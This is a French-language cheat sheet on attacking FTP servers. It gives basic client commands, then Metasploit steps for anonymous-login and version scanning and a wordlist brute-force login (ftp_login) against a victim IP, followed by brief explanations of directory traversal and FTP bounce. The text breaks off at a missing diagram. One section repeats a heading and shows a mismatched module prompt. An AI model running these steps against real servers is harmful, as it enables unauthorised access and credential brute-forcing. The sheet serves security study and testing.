FTP

  1. Liste de commandes basiques

Connexion à un serveur ftp :

  • ftp <ip>

Lister fichiers dans un serveur ftp 

  • ls / dir

Récupérer un fichier dans un serveur ftp

  • get <nom du fichier>
  1. Exploitation d’un serveur FTP mal configuré avec Metasploit :
  • msfconsole 
  • use auxiliary/scanner/ftp/anonymous
  • msf auxiliary(anonymous) >set rhosts <ip victime>
  • msf auxiliary(anonymous) >exploit
  1. Exploitation d’un serveur FTP mal configuré avec Metasploit :
  • msfconsole 
  • use auxiliary/scanner/ftp/ftp_version
  • msf auxiliary(anonymous) >set rhosts <ip victime>
  • msf auxiliary(anonymous) >exploit
  1.  FTP sniffing and Brute Force Attack :
  • msfconsole 
  • use auxiliary/scanner/ftp/ftp_login
  • msf auxiliary(ftp_login) > set rhosts 192.168.01.106
  • msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
  • msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
  • msf auxiliary(ftp_login) > set stop_on_success true
  • msf auxiliary(ftp_login) > exploit
  1. Directory Traversal Attack 

Une autre vulnérabilité FTP inclut les attaques de directory traversal dans lesquelles l’attaque réussie écrase ou crée des fichiers non autorisés qui sont stockés à l’extérieur du dossier racine Web.

  1.  FTP Bounce 

Le FTP Bounce signifie Rebond FTP. C’est un cas de spoofing d’adresse IP. Elle est basée sur une utilisation de la commande PORT du protocole FTP lorsque le serveur FTP est en mode actif. En effet, cette commande permet de se connecter à n’importe quel autre serveur distant, et à un port donné. Dans ce cas, il est possible que la sécurité du serveur cible soit compromis, dans le cas ou il effectue une vérification des adresses IP d’origine. En effet, l’adresse IP que le serveur cible verra sera l’adresse IP du serveur FTP, et non de l’adresse IP de l’attaquant. 

Ce petit schéma explique la technique utilisée :